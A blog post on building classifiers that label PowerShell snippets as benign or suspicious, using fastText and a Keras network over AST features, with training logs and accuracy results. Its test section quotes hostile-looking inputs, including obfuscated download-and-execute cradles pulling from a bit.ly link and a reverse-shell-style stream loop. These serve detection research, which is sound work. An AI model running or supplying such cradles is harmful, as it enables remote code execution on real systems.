detection – Attacker's Mindset

Recently I’ve been wanting to dive into anomaly detection and classification problems. I’m starting by exploring a binary classification problem: determining whether a PowerShell snippet is benign or suspicious.

There are many different approaches to this class of problem. I decided to start with a “batteries-included” approach to text classification with the help of fastText (https://github.com/facebookresearch/fastText). This awesome piece of software from Facebook Research can perform both unsupervised and supervised training with tunable parameters on a set of pre-processed input data.

Similar to most other data science projects, I started this by spending a significant amount of time identifying and categorizing source material, mostly by scraping PowerShell scripts available from a variety of sources (e.g., GitHub, Hybrid Analysis, etc). Each script was saved into a labelled directory indicating what type of scripts it contains. Since this is a binary classification task, we are only going to be using the labels of ‘suspicious’ or ‘benign’ with each script having exactly 1 label.

A future task would be adding additional labels such as “malicious” to provide more flexibility to the classifications and subsequent conclusions we draw from them (I stored them with some flexibility to distinguish between suspicious and purely malicious but am only using the single label of ‘suspicious’ for this experiment).

Example showing data organization / classification structure

Another approach to this problem would be creating many different distinct labels and using the percent confidence for each to infer what the functionality of the script is, what MITRE Techniques it is employing, etc.

Text Classification with fastText

Supervised learning with fastText for text classification is done by supplying the model with an input file in a specific format. The file should contain line-delimited data, where each line begins with all of the labels that apply to that line. The default format for labels is ‘__label__$VAR’, where $VAR is the relevant keyword, giving labels such as ‘__label__benign’.

__label__benign some line of data
__label__suspicious another line of data

For this experiment, I wanted to try a few different methods of classifying scripts. Initially, I did a very basic implementation to try a pure text classification approach. Later on, I’d like to combine this model’s prediction output with an Abstract Syntax Tree (AST) neural network analysis to produce a combined probability matrix, which we can then analyze to determine more effectively whether a script is suspicious or not.

For now, I took the following approach to data preparation:

Read each script into memory
Normalize the data by stripping whitespace and lower-casing the entire script
Remove unwanted characters to help improve classification traits
Write each script (as a single string per-line) into a file with the relevant label as a prefix
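
The preparation steps above can be sketched roughly as follows. This is a minimal illustration, not the exact code used for this post: the function names, the `<root>/<label>/*.ps1` directory layout, and the choice to treat everything outside printable ASCII as an unwanted character are all assumptions.

```python
import re
from pathlib import Path

# Assumption: "unwanted characters" means anything outside printable ASCII
# (tabs and newlines are kept here and collapsed in the next step).
UNWANTED = re.compile(r"[^\x09\x0a\x0d\x20-\x7e]")


def normalize(script: str) -> str:
    """Lower-case a script and flatten it into a single line."""
    text = UNWANTED.sub(" ", script.lower())
    # split()/join collapses every run of whitespace, including newlines,
    # so each script ends up as exactly one line of the training file.
    return " ".join(text.split())


def to_fasttext_line(label: str, script: str) -> str:
    """Prefix the normalized script with its fastText label."""
    return f"__label__{label} {normalize(script)}"


def build_corpus(root: Path, out_file: Path, labels=("benign", "suspicious")) -> int:
    """Write one labelled line per .ps1 file found under root/<label>/."""
    count = 0
    with out_file.open("w", encoding="utf-8") as out:
        for label in labels:
            for path in sorted((root / label).rglob("*.ps1")):
                script = path.read_text(encoding="utf-8", errors="ignore")
                out.write(to_fasttext_line(label, script) + "\n")
                count += 1
    return count
```

Flattening each script to a single line matters because fastText treats every line of the input file as one sample.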

After this initial data aggregation step, I shuffled the line ordering and split the data into a 70/30 mix of training and test data respectively. Training on 100% of the source data leaves nothing to measure generalization with, so a model that has overfit to the training data would go unnoticed until it fails on new data. Holding out a test set helps identify that problem and mitigate it early on.
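
A shuffle-and-split step like the one described can be sketched in a few lines. The function name and the fixed seed are assumptions added for reproducibility; they are not taken from the original pipeline.

```python
import random


def shuffle_and_split(lines, train_fraction=0.7, seed=42):
    """Shuffle labelled lines and split them into (train, test) lists."""
    shuffled = list(lines)                  # copy so the caller's list is untouched
    random.Random(seed).shuffle(shuffled)   # seeded for repeatable splits
    cut = int(len(shuffled) * train_fraction)
    return shuffled[:cut], shuffled[cut:]
```

The two lists can then be written to files such as 'pslearn.train' and 'pslearn.test', one line per sample.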

Total Scripts: 10433 
Training Data Length: 7303 
Testing Data Length: 3130 
Suspicious Scripts: 4776 
Benign Scripts: 5657

Now it’s time for the fun part. Training a fastText model can have a lot of nuances, but at its core it can be done in two lines like this.

import fasttext
model = fasttext.train_supervised('pslearn.train')

That’s it! I can now use the test dataset to gauge the prediction accuracy of this first supervised fastText model.

model.test('pslearn.test')
(3130, 0.9450479233226837, 0.9450479233226837)

The first number (3130) represents the number of samples in the test data. The second number represents the precision (~94%) and the last number represents the recall (~94%).

Per fastText documentation:

The precision is the number of correct labels among the labels predicted by fastText. The recall is the number of labels that successfully were predicted, among all the real labels.
https://fasttext.cc/docs/en/supervised-tutorial.html
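
The precision and recall values above are identical, and that follows from the definitions: every sample here has exactly one true label and the test asks for one predicted label per sample, so both metrics reduce to the fraction of samples classified correctly. The helper below is a plain-Python sketch of those definitions (it is not fastText’s implementation, and its name is made up for illustration).

```python
def precision_recall(true_labels, predicted_labels):
    """Compute (precision, recall) from per-sample label lists."""
    # A prediction is correct when the label appears in both lists for a sample.
    correct = sum(len(set(t) & set(p)) for t, p in zip(true_labels, predicted_labels))
    n_predicted = sum(len(p) for p in predicted_labels)  # denominator for precision
    n_true = sum(len(t) for t in true_labels)            # denominator for recall
    return correct / n_predicted, correct / n_true


truth = [["benign"], ["suspicious"], ["suspicious"], ["benign"]]
preds = [["benign"], ["suspicious"], ["benign"], ["benign"]]
precision, recall = precision_recall(truth, preds)  # both 0.75: 3 of 4 correct
```

By the same arithmetic, a value of 0.9450479233226837 over 3130 samples corresponds to 2958 correct predictions.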

A precision of ~94% seems extremely high for a first attempt. I have a very limited sample set, and it is highly likely that I have accidentally introduced a significant amount of bias into the source data. One way to address this is to review the data and make sure it contains a wide variety of samples in different formats and styles, which adds variety to both the training and testing data.

For now, let’s see if I can improve the model by using some additional options provided by fastText: word n-grams and epoch count. By default, fastText only uses 5 epochs for learning. Let’s try tripling that number to 15 and see if there is any effect on the accuracy.

model = fasttext.train_supervised('pslearn.train', epoch=15)
model.test('pslearn.test')
(3130, 0.9619808306709265, 0.9619808306709265)

A small increase in the number of epochs raised precision from ~94.5% to ~96.2%. The trade-off is a longer processing time when training (or re-training) the model. Since the data set is relatively small (~100 MB), I can experiment with extremely high epoch counts such as 1000+, like below.

model = fasttext.train_supervised('pslearn.train', epoch=1000)
model.test('pslearn.test')
(3130, 0.9769968051118211, 0.9769968051118211)

The key to data science is always experimentation. I played with the epoch count for a while to find the best balance between training time, accuracy, and the risk of overfitting to the current data. At 500 epochs precision was still 97.6%; 250 epochs actually increased it to 98%, 100 epochs gave 97.8%, 50 epochs gave 97.5%, and 25 epochs gave 96.9%. I decided to keep it at 25 for most of this experiment to limit overfitting.
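
This kind of manual sweep is easy to script. The helper below is a hypothetical sketch: `sweep`, `train`, and `evaluate` are names invented here, and the training and evaluation steps are passed in as callables so the loop itself does not depend on any particular library.

```python
def sweep(train, evaluate, values):
    """Train one model per value and collect (value, precision, recall)."""
    results = []
    for value in values:
        model = train(value)
        # evaluate() is expected to return (n_samples, precision, recall),
        # which is the shape of the tuples printed by model.test() above.
        _, precision, recall = evaluate(model)
        results.append((value, precision, recall))
    return results


# Possible wiring with fastText (needs the fasttext package and the data files):
#   import fasttext
#   results = sweep(
#       train=lambda e: fasttext.train_supervised('pslearn.train', epoch=e),
#       evaluate=lambda m: m.test('pslearn.test'),
#       values=[25, 50, 100, 250, 500],
#   )
```

The same loop works for other parameters, such as the learning rate, by changing what the `train` callable does with each value.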

In addition to epoch count, one of the other commonly tuned parameters for a fastText model is the learning rate. For a detailed explanation, check out the documentation at https://fasttext.cc/docs/en/supervised-tutorial.html. The default learning rate is 0.1, but let’s try 0.2 and see if there is any improvement when using an epoch count of 25.

model = fasttext.train_supervised('pslearn.train', epoch=25, lr=0.2)
model.test('pslearn.test')
(3130, 0.9750798722044729, 0.9750798722044729)

Doubling the learning rate improved our base accuracy at 25 epochs from ~96.9% to ~97.5%.

There’s one last thing I should experiment with: the word n-grams argument (wordNgrams). For a detailed explanation of n-grams, check out https://towardsdatascience.com/understanding-word-n-grams-and-n-gram-probability-in-natural-language-processing-9d9eef0fa058. The default value in fastText is 1. Let’s try a few different values and observe the effect on prediction accuracy.

model = fasttext.train_supervised('pslearn.train', epoch=25, lr=0.2, wordNgrams=2)
model.test('pslearn.test')
(3130, 0.9738019169329073, 0.9738019169329073)
###
model = fasttext.train_supervised('pslearn.train', epoch=25, lr=0.2, wordNgrams=5)
model.test('pslearn.test')
(3130, 0.9584664536741214, 0.9584664536741214)
###
model = fasttext.train_supervised('pslearn.train', epoch=25, lr=0.2, wordNgrams=10)
model.test('pslearn.test')
(3130, 0.9536741214057508, 0.9536741214057508)
###
model = fasttext.train_supervised('pslearn.train', epoch=25, lr=0.2, wordNgrams=50)
model.test('pslearn.test')
(3130, 0.9306709265175719, 0.9306709265175719)
###
model = fasttext.train_supervised('pslearn.train', epoch=25, lr=0.2, wordNgrams=100)
model.test('pslearn.test')
(3130, 0.9287539936102236, 0.9287539936102236)

The maximum word n-gram length should be chosen for the use case at hand and verified by experiment, since it can have a severe impact on model accuracy depending on the type of data. Here every value above 1 lowered precision (from ~97.5% at the default down to ~92.9% at 100), so I decided to leave it at the default for now.
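
For intuition about what the word n-gram setting controls, the sketch below lists the token windows considered for a given maximum length. It is only an illustration: fastText builds and hashes these features internally, and the function name here is made up.

```python
def word_ngrams(text, max_n):
    """Return all word n-grams of length 1..max_n, in order of length."""
    tokens = text.split()
    grams = []
    for n in range(1, max_n + 1):
        # Slide a window of n tokens across the line.
        for i in range(len(tokens) - n + 1):
            grams.append(" ".join(tokens[i:i + n]))
    return grams


example = word_ngrams("invoke-expression (new-object net.webclient)", 2)
# -> 3 single tokens followed by 2 adjacent pairs
```

With very large values, most windows are longer than anything that repeats between scripts, which is one plausible reason the scores above dropped as the value grew.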

fastText provides many other parameters for model tuning – view them all at https://fasttext.cc/docs/en/options.html.

Below are the results of some ad-hoc tests I ran against the model, using arbitrary PowerShell snippets that were not included in the training or testing data.

Input: invoke-expression -command ([text.encoding]::unicode.getstring([convert]::frombase64string("vwbyagkadablac0asabvahmadaagaciadab3aguazqb0acwaiab0ahcazqblahqaiqaiaa==
Confidence __label__suspicious: 97.43660092353821%
Confidence __label__benign: 2.5653984397649765%

Input: enable-windowsoptionalfeature -online -featurename microsoft-hyper-v -all -norestart
Confidence __label__benign: 56.333380937576294%
Confidence __label__suspicious: 43.66862177848816%

Input: $output  | ft -property @{n="$source";e={$_.$source};a="center"},@{n="$dest";e={$_.$dest};a="center"},@{n="$temp";e={$_.$temp};a="center"}
Confidence __label__benign: 71.88595533370972%
Confidence __label__suspicious: 28.116050362586975%

Input: $null = [getclipboardprocess]::getwindowthreadprocessid([getclipboardprocess]::getopenclipboardwindow(), [ref]$processid)
Confidence __label__suspicious: 99.66542720794678%
Confidence __label__benign: 0.33657397143542767%

Input: while (!$process.hasexited) {try {$bytes = $stream.read($buffer, 0, $buffer.length); # unblock with timeoutif ($bytes -gt 0) {$process.standardinput.write($buffer, 0, $bytes);} else { break; }} catch [management.automation.methodinvocationexception] {}if ($stderr.length -gt 0) {$writer.write($stdout.tostring()); $stdout.clear();}if ($stdout.length -gt 0) {$writer.write($stdout.tostring()); $stdout.clear();}}
Confidence __label__suspicious: 99.98868703842163%
Confidence __label__benign: 0.013308007328305393%

Input: $flowpanel.flowdirection = [system.windows.forms.flowdirection]::righttoleft
Confidence __label__suspicious: 86.15033030509949%
Confidence __label__benign: 13.851676881313324%

Input: invoke-command -computer wks1,wks2,wks3 -scriptblock { disable-windowsoptionalfeature -online -featurename "microsoftwindowspowershellv2" -norestart }
Confidence __label__benign: 99.58958029747009%
Confidence __label__suspicious: 0.41241757571697235%

Input: invoke-expression (new-object net.web`c`l`i`ent)."`d`o`wnloadstring"('h'+'t'+'t'+'ps://bit.ly/l3g1t')
Confidence __label__suspicious: 99.85156059265137%
Confidence __label__benign: 0.1504492713138461%

Input: powershell.exe `wr`it`e-`h`ost alertmeagain
Confidence __label__suspicious: 94.03488039970398%
Confidence __label__benign: 5.9671226888895035%

Input: powershell.exe (new-object net.webclient).downloadstring("https://bit.ly/l3g1t")
Confidence __label__suspicious: 99.99812841415405%
Confidence __label__benign: 0.0038762060285080224%
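
Output in the shape shown above can be produced with a small wrapper around the model’s predict() call, which returns the top k labels and their probabilities. This is a sketch rather than the script used for this post: the `report` function is hypothetical, and it assumes ad-hoc input is flattened and lower-cased the same way as the training data.

```python
def report(model, script, k=2):
    """Return 'Input / Confidence' lines for one PowerShell snippet."""
    # predict() works on a single line of text, so collapse newlines and
    # other whitespace first (assumed to mirror the training normalization).
    text = " ".join(script.lower().split())
    labels, probs = model.predict(text, k=k)
    lines = [f"Input: {text}"]
    for label, prob in zip(labels, probs):
        lines.append(f"Confidence {label}: {float(prob) * 100}%")
    return lines


# Possible usage with a trained model:
#   for line in report(model, "powershell.exe `wr`it`e-`h`ost alertmeagain"):
#       print(line)
```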

97% accuracy? Really?

No, not really. I have a really small sample set and it is highly biased. I also don’t have many ‘real world’ samples right now, but I am working on a pipeline to generate more variants like those you might expect to see in a true adversary engagement. As shown above, this type of ‘simple’ text classification can work, but it falls short in highly complex use cases where the same ‘sentiment’ can be expressed in hundreds of ways. What else can I do?

Embed additional labels for each script to help with classification, and add a secondary process that estimates probability based on the confidence in each label
Gather/Generate additional source data for better classification and a wider variety of training and testing data
Experiment with different text classification models
etc

Using fastText itself is ridiculously easy. The hard part of a data scientist’s life is preparing the source material. Data pre-processing pipelines are often extremely complex in order to ensure the cleanest feed to downstream ML models, and the exact type of processing required typically depends on project-specific factors such as the overall objective and the types of machine-learning models or approaches in use.

AST Modeling in a Deep Neural Network (DNN)

In addition to text classification, I wanted to try feature engineering for a machine-learning model. Ultimately, I decided to use my features inside a “Wide & Deep” style network built with Keras and TensorFlow. Feature engineering is probably one of the most important parts of any ML workflow. For this project I took a basic approach: using https://github.com/thewhiteninja/deobshell, I generated optimized AST files for each of the previously collected PowerShell scripts.

What is an AST file? – https://powershell.one/powershell-internals/parsing-and-tokenization/abstract-syntax-tree

By generating features from these ‘optimized’ AST representations, we can analyze script functionality at a lower level than the raw .ps1 text and gain more meaningful insight into the components that make up the script.

Why would I want to do this? fastText is great, but studying the data at a lower level in a neural network could give teams deeper insight than fastText alone provides. Ultimately, the best approach would be to have multiple prediction pipelines, collect the outputs from the various models, and glue the results together with some logic.
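
As one hypothetical example of such glue logic, the sketch below blends the ‘suspicious’ probability from a text model with the one from an AST-based model using a weighted average. The function name, the weight, and the threshold are illustrative assumptions, not values used anywhere in this post.

```python
def combine_scores(p_text, p_ast, w_text=0.5, threshold=0.5):
    """Blend two 'suspicious' probabilities and return (score, label)."""
    for p in (p_text, p_ast):
        if not 0.0 <= p <= 1.0:
            raise ValueError("probabilities must be between 0 and 1")
    # Weighted average: w_text controls how much the text model is trusted.
    score = w_text * p_text + (1.0 - w_text) * p_ast
    label = "suspicious" if score >= threshold else "benign"
    return score, label
```

A weighted average is only the simplest option; the weights could just as well be learned from the held-out data by a small second-stage model.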

I parsed each AST and generated a set of features representing the items below (along with a few others):

Distinct PowerShell Tree-Type Count
Sum for each type of AST Object present in the script (CommandElementAST, etc)
Variable / Operator / Condition sums
Presence of certain ‘suspicious’ strings inside the script (‘IEX’, etc)
etc
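
A rough sketch of this kind of feature extraction is shown below. It rests on several assumptions: that the AST is available as XML with one element per node whose tag is the node type, that the node names match those used in the test input, and that the suspicious-string list looks like the one given here. None of these are confirmed details of the original pipeline, and only ‘IEX’ comes from the list above.

```python
import xml.etree.ElementTree as ET
from collections import Counter

# Illustrative list only; the post names 'IEX' and leaves the rest unspecified.
SUSPICIOUS_STRINGS = ("iex", "frombase64string", "downloadstring")


def ast_features(ast_xml: str, script_text: str) -> dict:
    """Build a flat feature dictionary from an XML AST and the raw script."""
    root = ET.fromstring(ast_xml)
    # Count how often each node type (element tag) occurs in the tree.
    type_counts = Counter(node.tag for node in root.iter())
    features = {"distinct_node_types": len(type_counts)}
    for node_type, count in type_counts.items():
        features[f"count_{node_type}"] = count
    # Flag the presence of known-suspicious substrings in the script text.
    lowered = script_text.lower()
    for needle in SUSPICIOUS_STRINGS:
        features[f"has_{needle}"] = 1.0 if needle in lowered else 0.0
    return features
```

To produce a CSV, the per-script dictionaries would still need to be aligned to one fixed column set, with 0 filled in for node types a script does not contain.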

Once I have the data cleaned and stored appropriately in a CSV, I can set up the below workflow for running independent experiments (code truncated for readability).

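# Setup Required Imports, Constants, etc
import tensorflow as tf
from tensorflow import keras

# raw_data holds the feature table read from the CSV (loading code truncated);
# the .columns attribute suggests a pandas DataFrame
CSV_HEADER = list(raw_data.columns)
# Every column except the target label is treated as a numeric feature
NUMERIC_FEATURE_NAMES = [c for c in CSV_HEADER if c != 'label']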

# All of my features are numeric and not categorical
TARGET_FEATURE_NAME = "label"
TARGET_FEATURE_LABELS = [0.0, 1.0]
CATEGORICAL_FEATURES_WITH_VOCABULARY = {}
CATEGORICAL_FEATURE_NAMES = list(CATEGORICAL_FEATURES_WITH_VOCABULARY.keys())
FEATURE_NAMES = NUMERIC_FEATURE_NAMES + CATEGORICAL_FEATURE_NAMES
COLUMN_DEFAULTS = [[0.0] for feature_name in CSV_HEADER]
NUM_CLASSES = len(TARGET_FEATURE_LABELS)

# How the model will parse the data from disk
def get_dataset_from_csv(csv_file_path, batch_size, shuffle=False):
    dataset = tf.data.experimental.make_csv_dataset(
        csv_file_path,
        batch_size=batch_size,
        column_names=CSV_HEADER,
        column_defaults=COLUMN_DEFAULTS,
        label_name=TARGET_FEATURE_NAME,
        num_epochs=1,
        header=True,
        shuffle=shuffle,
    )
    return dataset.cache()

# Invoke an experiment
def run_experiment(model):
    model.compile(
        optimizer=keras.optimizers.Adam(learning_rate=learning_rate),
        loss=keras.losses.SparseCategoricalCrossentropy(),
        metrics=[keras.metrics.SparseCategoricalAccuracy()],
    )
    train_dataset = get_dataset_from_csv(train_data_file, batch_size, shuffle=True)
    test_dataset = get_dataset_from_csv(test_data_file, batch_size)
    print("Start training the model...")
    history = model.fit(train_dataset, epochs=num_epochs)
    print("Model training finished")
    _, accuracy = model.evaluate(test_dataset, verbose=0)
    print(f"Test accuracy: {round(accuracy * 100, 2)}%")

# Encode Input Layers
def create_model_inputs():
    return inputs

# Encode Features depending on type
def encode_inputs(inputs, use_embedding=False):
    return all_features

# Create Keras Network Model - using a softmax output 
def create_wide_and_deep_model():
    return model

# Run the experiment!
wide_and_deep_model = create_wide_and_deep_model()
#keras.utils.plot_model(wide_and_deep_model, show_shapes=True, rankdir="LR")
run_experiment(wide_and_deep_model)

Start training the model...
Epoch 1/10
32/32 [==============================] - 453s 3s/step - loss: 0.4908 - sparse_categorical_accuracy: 0.7793
Epoch 2/10
32/32 [==============================] - 8s 239ms/step - loss: 0.2756 - sparse_categorical_accuracy: 0.9325
Epoch 3/10
32/32 [==============================] - 8s 245ms/step - loss: 0.2000 - sparse_categorical_accuracy: 0.9508
Epoch 4/10
32/32 [==============================] - 8s 244ms/step - loss: 0.1548 - sparse_categorical_accuracy: 0.9580
Epoch 5/10
32/32 [==============================] - 8s 245ms/step - loss: 0.1358 - sparse_categorical_accuracy: 0.9640
Epoch 6/10
32/32 [==============================] - 8s 249ms/step - loss: 0.1196 - sparse_categorical_accuracy: 0.9656
Epoch 7/10
32/32 [==============================] - 8s 246ms/step - loss: 0.1073 - sparse_categorical_accuracy: 0.9671
Epoch 8/10
32/32 [==============================] - 8s 245ms/step - loss: 0.0965 - sparse_categorical_accuracy: 0.9695
Epoch 9/10
32/32 [==============================] - 8s 243ms/step - loss: 0.1022 - sparse_categorical_accuracy: 0.9666
Epoch 10/10
32/32 [==============================] - 8s 244ms/step - loss: 0.0940 - sparse_categorical_accuracy: 0.9711
Model training finished
Test accuracy: 74.9%

In the end, the network predicted whether a script in the test data was suspicious with ~75% accuracy, which is not too bad for a very first attempt, although it is well below the ~97% reached on the training data. Doubling the epoch count to 20 got me to ~80% accuracy without a huge risk of over-fitting. What else could I do to improve this?

Feature Dimensionality Reduction (Linearly with PCA or non-linearly with better AutoEncoders)
Better Feature Engineering – it is very basic currently
Tuning Model Parameters/Hyperparameters manually to experiment with learning impact
Better AST Optimization/Script De-obfuscation Techniques
etc

I have some other ideas for feature-building techniques for PowerShell analysis that I’m excited to keep exploring and building machine-learning models around. If you’re interested in similar topics, reach out and let’s discuss!

Using machine learning to identify evil isn’t a new concept, but the exact techniques are not often shared publicly, for a few reasons. First, threat actors could analyze and then work around the detection mechanisms. Second, these workflows often power revenue-generating streams, and sharing them could impact profits. I’m hoping that in the coming years the open-source detection community starts to build and share more ready-to-use models that organizations can use for these types of classification tasks.

Look out for the next post, which should be interesting, and let me know if there are any questions!
